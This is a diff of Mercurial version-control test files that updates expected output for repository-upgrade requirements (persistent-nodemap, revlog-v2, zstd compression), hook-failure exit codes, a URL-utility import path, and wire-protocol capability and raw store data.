@@ -1007,7 +1042,8 @@
upgrade will perform the following actions:
requirements
- preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store
+ preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-rust !)
+ preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, sparserevlog, store (rust !)
optimisations: re-delta-fulladd
@@ -1070,6 +1106,7 @@
fncache
generaldelta
largefiles
+ persistent-nodemap (rust !)
revlogv1
sparserevlog
store
@@ -1081,6 +1118,7 @@
fncache
generaldelta
largefiles
+ persistent-nodemap (rust !)
revlogv1
sparserevlog
store
@@ -1158,6 +1196,7 @@
> maxchainlen = 9001
> EOF
$ hg config format
+ format.revlog-compression=$BUNDLE2_COMPRESSIONS$
format.maxchainlen=9001
$ hg debugdeltachain file
rev chain# chainlen prev delta size rawsize chainsize ratio lindist extradist extraratio readsize largestblk rddensity srchunks
@@ -1169,7 +1208,8 @@
upgrade will perform the following actions:
requirements
- preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store
+ preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-rust !)
+ preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, sparserevlog, store (rust !)
optimisations: re-delta-all
@@ -1229,6 +1269,7 @@
dotencode
fncache
generaldelta
+ persistent-nodemap (rust !)
revlogv1
store
@@ -1237,7 +1278,8 @@
upgrade will perform the following actions:
requirements
- preserved: dotencode, fncache, generaldelta, revlogv1, store
+ preserved: dotencode, fncache, generaldelta, revlogv1, store (no-rust !)
+ preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, store (rust !)
added: sparserevlog
processed revlogs:
@@ -1249,6 +1291,7 @@
dotencode
fncache
generaldelta
+ persistent-nodemap (rust !)
revlogv1
sparserevlog
store
@@ -1258,7 +1301,8 @@
upgrade will perform the following actions:
requirements
- preserved: dotencode, fncache, generaldelta, revlogv1, store
+ preserved: dotencode, fncache, generaldelta, revlogv1, store (no-rust !)
+ preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, store (rust !)
removed: sparserevlog
processed revlogs:
@@ -1270,6 +1314,7 @@
dotencode
fncache
generaldelta
+ persistent-nodemap (rust !)
revlogv1
store
@@ -1284,7 +1329,8 @@
upgrade will perform the following actions:
requirements
- preserved: dotencode, fncache, generaldelta, revlogv1, store
+ preserved: dotencode, fncache, generaldelta, revlogv1, store (no-rust !)
+ preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, store (rust !)
added: revlog-compression-zstd, sparserevlog
processed revlogs:
@@ -1299,16 +1345,19 @@
generaldelta: yes yes yes
share-safe: no no no
sparserevlog: yes yes yes
- sidedata: no no no
- persistent-nodemap: no no no
+ persistent-nodemap: no no no (no-rust !)
+ persistent-nodemap: yes yes no (rust !)
copies-sdc: no no no
+ revlog-v2: no no no
plain-cl-delta: yes yes yes
- compression: zstd zlib zlib
+ compression: zlib zlib zlib (no-zstd !)
+ compression: zstd zlib zstd (zstd !)
compression-level: default default default
$ cat .hg/requires
dotencode
fncache
generaldelta
+ persistent-nodemap (rust !)
revlog-compression-zstd
revlogv1
sparserevlog
@@ -1320,7 +1369,8 @@
upgrade will perform the following actions:
requirements
- preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store
+ preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-rust !)
+ preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, sparserevlog, store (rust !)
removed: revlog-compression-zstd
processed revlogs:
@@ -1335,16 +1385,19 @@
generaldelta: yes yes yes
share-safe: no no no
sparserevlog: yes yes yes
- sidedata: no no no
- persistent-nodemap: no no no
+ persistent-nodemap: no no no (no-rust !)
+ persistent-nodemap: yes yes no (rust !)
copies-sdc: no no no
+ revlog-v2: no no no
plain-cl-delta: yes yes yes
- compression: zlib zlib zlib
+ compression: zlib zlib zlib (no-zstd !)
+ compression: zlib zlib zstd (zstd !)
compression-level: default default default
$ cat .hg/requires
dotencode
fncache
generaldelta
+ persistent-nodemap (rust !)
revlogv1
sparserevlog
store
@@ -1359,7 +1412,8 @@
upgrade will perform the following actions:
requirements
- preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store
+ preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-rust !)
+ preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, sparserevlog, store (rust !)
added: revlog-compression-zstd
processed revlogs:
@@ -1374,16 +1428,19 @@
generaldelta: yes yes yes
share-safe: no no no
sparserevlog: yes yes yes
- sidedata: no no no
- persistent-nodemap: no no no
+ persistent-nodemap: no no no (no-rust !)
+ persistent-nodemap: yes yes no (rust !)
copies-sdc: no no no
+ revlog-v2: no no no
plain-cl-delta: yes yes yes
- compression: zstd zstd zlib
+ compression: zlib zlib zlib (no-zstd !)
+ compression: zstd zstd zstd (zstd !)
compression-level: default default default
$ cat .hg/requires
dotencode
fncache
generaldelta
+ persistent-nodemap (rust !)
revlog-compression-zstd
revlogv1
sparserevlog
@@ -1400,10 +1457,12 @@
upgrade will perform the following actions:
requirements
- preserved: dotencode, fncache, generaldelta, revlogv1, store (no-zstd !)
- preserved: dotencode, fncache, generaldelta, revlog-compression-zstd, revlogv1, sparserevlog, store (zstd !)
- added: exp-sidedata-flag (zstd !)
- added: exp-sidedata-flag, sparserevlog (no-zstd !)
+ preserved: dotencode, fncache, generaldelta, store (no-zstd !)
+ preserved: dotencode, fncache, generaldelta, revlog-compression-zstd, sparserevlog, store (zstd no-rust !)
+ preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlog-compression-zstd, sparserevlog, store (rust !)
+ removed: revlogv1
+ added: exp-revlogv2.2, exp-sidedata-flag (zstd !)
+ added: exp-revlogv2.2, exp-sidedata-flag, sparserevlog (no-zstd !)
processed revlogs:
- all-filelogs
@@ -1417,20 +1476,22 @@
generaldelta: yes yes yes
share-safe: no no no
sparserevlog: yes yes yes
- sidedata: yes no no
- persistent-nodemap: no no no
+ persistent-nodemap: no no no (no-rust !)
+ persistent-nodemap: yes yes no (rust !)
copies-sdc: no no no
+ revlog-v2: yes no no
plain-cl-delta: yes yes yes
compression: zlib zlib zlib (no-zstd !)
- compression: zstd zstd zlib (zstd !)
+ compression: zstd zstd zstd (zstd !)
compression-level: default default default
$ cat .hg/requires
dotencode
+ exp-revlogv2.2
exp-sidedata-flag
fncache
generaldelta
+ persistent-nodemap (rust !)
revlog-compression-zstd (zstd !)
- revlogv1
sparserevlog
store
$ hg debugsidedata -c 0
@@ -1444,9 +1505,11 @@
upgrade will perform the following actions:
requirements
- preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-zstd !)
- preserved: dotencode, fncache, generaldelta, revlog-compression-zstd, revlogv1, sparserevlog, store (zstd !)
- removed: exp-sidedata-flag
+ preserved: dotencode, fncache, generaldelta, sparserevlog, store (no-zstd !)
+ preserved: dotencode, fncache, generaldelta, revlog-compression-zstd, sparserevlog, store (zstd no-rust !)
+ preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlog-compression-zstd, sparserevlog, store (rust !)
+ removed: exp-revlogv2.2, exp-sidedata-flag
+ added: revlogv1
processed revlogs:
- all-filelogs
@@ -1460,17 +1523,19 @@
generaldelta: yes yes yes
share-safe: no no no
sparserevlog: yes yes yes
- sidedata: no no no
- persistent-nodemap: no no no
+ persistent-nodemap: no no no (no-rust !)
+ persistent-nodemap: yes yes no (rust !)
copies-sdc: no no no
+ revlog-v2: no no no
plain-cl-delta: yes yes yes
compression: zlib zlib zlib (no-zstd !)
- compression: zstd zstd zlib (zstd !)
+ compression: zstd zstd zstd (zstd !)
compression-level: default default default
$ cat .hg/requires
dotencode
fncache
generaldelta
+ persistent-nodemap (rust !)
revlog-compression-zstd (zstd !)
revlogv1
sparserevlog
@@ -1487,9 +1552,11 @@
upgrade will perform the following actions:
requirements
- preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-zstd !)
- preserved: dotencode, fncache, generaldelta, revlog-compression-zstd, revlogv1, sparserevlog, store (zstd !)
- added: exp-sidedata-flag
+ preserved: dotencode, fncache, generaldelta, sparserevlog, store (no-zstd !)
+ preserved: dotencode, fncache, generaldelta, revlog-compression-zstd, sparserevlog, store (zstd no-rust !)
+ preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlog-compression-zstd, sparserevlog, store (rust !)
+ removed: revlogv1
+ added: exp-revlogv2.2, exp-sidedata-flag
processed revlogs:
- all-filelogs
@@ -1503,20 +1570,22 @@
generaldelta: yes yes yes
share-safe: no no no
sparserevlog: yes yes yes
- sidedata: yes yes no
- persistent-nodemap: no no no
+ persistent-nodemap: no no no (no-rust !)
+ persistent-nodemap: yes yes no (rust !)
copies-sdc: no no no
+ revlog-v2: yes yes no
plain-cl-delta: yes yes yes
compression: zlib zlib zlib (no-zstd !)
- compression: zstd zstd zlib (zstd !)
+ compression: zstd zstd zstd (zstd !)
compression-level: default default default
$ cat .hg/requires
dotencode
+ exp-revlogv2.2
exp-sidedata-flag
fncache
generaldelta
+ persistent-nodemap (rust !)
revlog-compression-zstd (zstd !)
- revlogv1
sparserevlog
store
$ hg debugsidedata -c 0
--- a/tests/test-url-download.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-url-download.t Tue Apr 20 11:01:06 2021 -0400
@@ -34,6 +34,8 @@
$ hg debugdownload ./null.txt
1 0000000000000000000000000000000000000000
+ $ cat ../error.log
+
Test largefile URL
------------------
@@ -66,3 +68,5 @@
$ hg debugdownload "largefile://a57b57b39ee4dc3da1e03526596007f480ecdbe8"
1 0000000000000000000000000000000000000000
$ cd ..
+
+ $ cat error.log
--- a/tests/test-url.py Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-url.py Tue Apr 20 11:01:06 2021 -0400
@@ -275,7 +275,7 @@
def test_url():
"""
>>> from mercurial import error, pycompat
- >>> from mercurial.util import url
+ >>> from mercurial.utils.urlutil import url
>>> from mercurial.utils.stringutil import forcebytestr
This tests for edge cases in url.URL's parsing algorithm. Most of
--- a/tests/test-win32text.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-win32text.t Tue Apr 20 11:01:06 2021 -0400
@@ -38,7 +38,7 @@
transaction abort!
rollback completed
abort: pretxncommit.crlf hook failed
- [255]
+ [40]
$ mv .hg/hgrc .hg/hgrc.bak
@@ -77,7 +77,7 @@
transaction abort!
rollback completed
abort: pretxnchangegroup.crlf hook failed
- [255]
+ [40]
$ mv .hg/hgrc.bak .hg/hgrc
$ echo hello > f
@@ -109,7 +109,7 @@
transaction abort!
rollback completed
abort: pretxncommit.crlf hook failed
- [255]
+ [40]
$ hg revert -a
forgetting d/f2
$ rm d/f2
@@ -286,7 +286,7 @@
transaction abort!
rollback completed
abort: pretxnchangegroup.crlf hook failed
- [255]
+ [40]
$ hg log -v
changeset: 5:f0b1c8d75fce
--- a/tests/test-wireproto-caching.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-wireproto-caching.t Tue Apr 20 11:01:06 2021 -0400
@@ -1,5 +1,10 @@
$ . $TESTDIR/wireprotohelpers.sh
+
+persistent-nodemap is not enabled by default. It is not relevant for this test so disable it.
+
$ cat >> $HGRCPATH << EOF
+ > [format]
+ > use-persistent-nodemap = no
> [extensions]
> blackbox =
> [blackbox]
--- a/tests/test-wireproto-command-capabilities.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-wireproto-command-capabilities.t Tue Apr 20 11:01:06 2021 -0400
@@ -2,6 +2,13 @@
$ . $TESTDIR/wireprotohelpers.sh
+persistent-nodemap is not enabled by default. It is not relevant for this test so disable it.
+
+ $ cat >> $HGRCPATH << EOF
+ > [format]
+ > use-persistent-nodemap = no
+ > EOF
+
$ hg init server
zstd isn't present in plain builds. Make tests easier by removing
@@ -150,7 +157,7 @@
s> Content-Type: application/mercurial-cbor\r\n
s> Content-Length: *\r\n (glob)
s> \r\n
- s> \xa3GapibaseDapi/Dapis\xa0Nv1capabilitiesY\x01\xf7batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
+ s> \xa3GapibaseDapi/Dapis\xa0Nv1capabilitiesY\x01\xe4batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
cbor> [
{
b'apibase': b'api/',
@@ -190,7 +197,7 @@
s> Content-Type: application/mercurial-cbor\r\n
s> Content-Length: *\r\n (glob)
s> \r\n
- s> \xa3GapibaseDapi/Dapis\xa0Nv1capabilitiesY\x01\xf7batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
+ s> \xa3GapibaseDapi/Dapis\xa0Nv1capabilitiesY\x01\xe4batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
cbor> [
{
b'apibase': b'api/',
@@ -223,7 +230,7 @@
s> Content-Type: application/mercurial-cbor\r\n
s> Content-Length: *\r\n (glob)
s> \r\n
- s> \xa3GapibaseDapi/Dapis\xa1Pexp-http-v2-0003\xa4Hcommands\xacIbranchmap\xa2Dargs\xa0Kpermissions\x81DpullLcapabilities\xa2Dargs\xa0Kpermissions\x81DpullMchangesetdata\xa2Dargs\xa2Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84IbookmarksGparentsEphaseHrevisionIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullHfiledata\xa2Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x83HlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDpath\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullIfilesdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84NfirstchangesetHlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDdictIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullTrecommendedbatchsize\x19\xc3PEheads\xa2Dargs\xa1Jpubliconly\xa3Gdefault\xf4Hrequired\xf4DtypeDboolKpermissions\x81DpullEknown\xa2Dargs\xa1Enodes\xa3Gdefault\x80Hrequired\xf4DtypeDlistKpermissions\x81DpullHlistkeys\xa2Dargs\xa1Inamespace\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullFlookup\xa2Dargs\xa1Ckey\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullLmanifestdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x82GparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDtree\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullTrecommendedbatchsize\x1a\x00\x01\x86\xa0Gpushkey\xa2Dargs\xa4Ckey\xa2Hrequired\xf5DtypeEbytesInamespace\xa2Hrequired\xf5DtypeEbytesCnew\xa2Hrequired\xf5DtypeEbytesCold\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpushPrawstorefiledata\xa2Dargs\xa2Efiles\xa2Hrequired\xf5DtypeDlistJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDlistKpermissions\x81DpullQframingmediatypes\x81X&application/mercurial-exp-framing-0006Rpathfilterprefixes\xd9\x01\x02\x82Epath:Lrootfilesin:Nrawrepoformats\x83LgeneraldeltaHrevlogv1LsparserevlogNv1capabilitiesY\x01\xf7batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
+ s> \xa3GapibaseDapi/Dapis\xa1Pexp-http-v2-0003\xa4Hcommands\xacIbranchmap\xa2Dargs\xa0Kpermissions\x81DpullLcapabilities\xa2Dargs\xa0Kpermissions\x81DpullMchangesetdata\xa2Dargs\xa2Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84IbookmarksGparentsEphaseHrevisionIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullHfiledata\xa2Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x83HlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDpath\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullIfilesdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84NfirstchangesetHlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDdictIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullTrecommendedbatchsize\x19\xc3PEheads\xa2Dargs\xa1Jpubliconly\xa3Gdefault\xf4Hrequired\xf4DtypeDboolKpermissions\x81DpullEknown\xa2Dargs\xa1Enodes\xa3Gdefault\x80Hrequired\xf4DtypeDlistKpermissions\x81DpullHlistkeys\xa2Dargs\xa1Inamespace\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullFlookup\xa2Dargs\xa1Ckey\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullLmanifestdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x82GparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDtree\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullTrecommendedbatchsize\x1a\x00\x01\x86\xa0Gpushkey\xa2Dargs\xa4Ckey\xa2Hrequired\xf5DtypeEbytesInamespace\xa2Hrequired\xf5DtypeEbytesCnew\xa2Hrequired\xf5DtypeEbytesCold\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpushPrawstorefiledata\xa2Dargs\xa2Efiles\xa2Hrequired\xf5DtypeDlistJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDlistKpermissions\x81DpullQframingmediatypes\x81X&application/mercurial-exp-framing-0006Rpathfilterprefixes\xd9\x01\x02\x82Epath:Lrootfilesin:Nrawrepoformats\x83LgeneraldeltaHrevlogv1LsparserevlogNv1capabilitiesY\x01\xe4batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
cbor> [
{
b'apibase': b'api/',
@@ -484,7 +491,7 @@
s> Content-Type: application/mercurial-cbor\r\n
s> Content-Length: *\r\n (glob)
s> \r\n
- s> \xa3GapibaseDapi/Dapis\xa1Pexp-http-v2-0003\xa4Hcommands\xacIbranchmap\xa2Dargs\xa0Kpermissions\x81DpullLcapabilities\xa2Dargs\xa0Kpermissions\x81DpullMchangesetdata\xa2Dargs\xa2Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84IbookmarksGparentsEphaseHrevisionIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullHfiledata\xa2Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x83HlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDpath\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullIfilesdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84NfirstchangesetHlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDdictIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullTrecommendedbatchsize\x19\xc3PEheads\xa2Dargs\xa1Jpubliconly\xa3Gdefault\xf4Hrequired\xf4DtypeDboolKpermissions\x81DpullEknown\xa2Dargs\xa1Enodes\xa3Gdefault\x80Hrequired\xf4DtypeDlistKpermissions\x81DpullHlistkeys\xa2Dargs\xa1Inamespace\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullFlookup\xa2Dargs\xa1Ckey\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullLmanifestdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x82GparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDtree\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullTrecommendedbatchsize\x1a\x00\x01\x86\xa0Gpushkey\xa2Dargs\xa4Ckey\xa2Hrequired\xf5DtypeEbytesInamespace\xa2Hrequired\xf5DtypeEbytesCnew\xa2Hrequired\xf5DtypeEbytesCold\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpushPrawstorefiledata\xa2Dargs\xa2Efiles\xa2Hrequired\xf5DtypeDlistJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDlistKpermissions\x81DpullQframingmediatypes\x81X&application/mercurial-exp-framing-0006Rpathfilterprefixes\xd9\x01\x02\x82Epath:Lrootfilesin:Nrawrepoformats\x83LgeneraldeltaHrevlogv1LsparserevlogNv1capabilitiesY\x01\xf7batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
+ s> \xa3GapibaseDapi/Dapis\xa1Pexp-http-v2-0003\xa4Hcommands\xacIbranchmap\xa2Dargs\xa0Kpermissions\x81DpullLcapabilities\xa2Dargs\xa0Kpermissions\x81DpullMchangesetdata\xa2Dargs\xa2Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84IbookmarksGparentsEphaseHrevisionIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullHfiledata\xa2Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x83HlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDpath\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullIfilesdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84NfirstchangesetHlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDdictIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullTrecommendedbatchsize\x19\xc3PEheads\xa2Dargs\xa1Jpubliconly\xa3Gdefault\xf4Hrequired\xf4DtypeDboolKpermissions\x81DpullEknown\xa2Dargs\xa1Enodes\xa3Gdefault\x80Hrequired\xf4DtypeDlistKpermissions\x81DpullHlistkeys\xa2Dargs\xa1Inamespace\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullFlookup\xa2Dargs\xa1Ckey\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullLmanifestdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x82GparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDtree\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullTrecommendedbatchsize\x1a\x00\x01\x86\xa0Gpushkey\xa2Dargs\xa4Ckey\xa2Hrequired\xf5DtypeEbytesInamespace\xa2Hrequired\xf5DtypeEbytesCnew\xa2Hrequired\xf5DtypeEbytesCold\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpushPrawstorefiledata\xa2Dargs\xa2Efiles\xa2Hrequired\xf5DtypeDlistJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDlistKpermissions\x81DpullQframingmediatypes\x81X&application/mercurial-exp-framing-0006Rpathfilterprefixes\xd9\x01\x02\x82Epath:Lrootfilesin:Nrawrepoformats\x83LgeneraldeltaHrevlogv1LsparserevlogNv1capabilitiesY\x01\xe4batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
sending capabilities command
s> setsockopt(6, 1, 1) -> None (?)
s> POST /api/exp-http-v2-0003/ro/capabilities HTTP/1.1\r\n
--- a/tests/test-wireproto-command-rawstorefiledata.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-wireproto-command-rawstorefiledata.t Tue Apr 20 11:01:06 2021 -0400
@@ -56,14 +56,17 @@
response: gen[
{
b'filecount': 1,
- b'totalsize': 527
+ b'totalsize': 527 (no-zstd !)
+ b'totalsize': 530 (zstd !)
},
{
b'location': b'store',
b'path': b'00changelog.i',
- b'size': 527
+ b'size': 527 (no-zstd !)
+ b'size': 530 (zstd !)
},
- b'\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00?\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff3\x90\xef\x85\x00s\xfb\xc2\xf0\xdf\xff"D4,\x8e\x92)\x01:\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00u992f4779029a3df8d0666d00bb924f69634e2641\ntest\n0 0\na\nb\n\ncommit 0\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00>\x00\x00\x00=\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xffD2\xd86&\xe8\xa9\x86U\xf0b\xec\x1f*C\xb0\x7f\x7f\xbb\xb0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00ua988fb43583e871d1ed5750ee074c6d840bbbfc8\ntest\n0 0\na\n\ncommit 1\x00\x00\x00\x00\x00~\x00\x00\x00\x00\x00N\x00\x00\x00W\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x01\xff\xff\xff\xff\xa4r\xd2\xea\x96U\x1a\x1e\xbb\x011-\xb2\xe6\xa7\x86\xd0F\x96o\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x9c%\xc5\xc1\t\xc0 \x0c\x05\xd0{\xa6p\x03cjI\xd71\xf9\x11<H\xa1u\x7fJ\xf1]\x9eyu\x98\xa2\xb0Z\x88jk0\x11\x95z\xa0\xdb\x11\\\x81S\xfc*\xb4\xe2]\xc4\x89\t\xe3\xe1\xec;\xfc\x95\x1c\xbbN\xe4\xf7\x9cc%\xf9\x00S#\x19\x13\x00\x00\x00\x00\x00\xcc\x00\x00\x00\x00\x00C\x00\x00\x00B\x00\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00\x02\xff\xff\xff\xff\x85kg{\x94a\x12i\xc5lW5[\x85\xf9\x95|\xfc\xc1\xb9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00u90231ddca36fa178a0eed99bd03078112487dda3\ntest\n0 0\ndir1/f\n\ncommit 3',
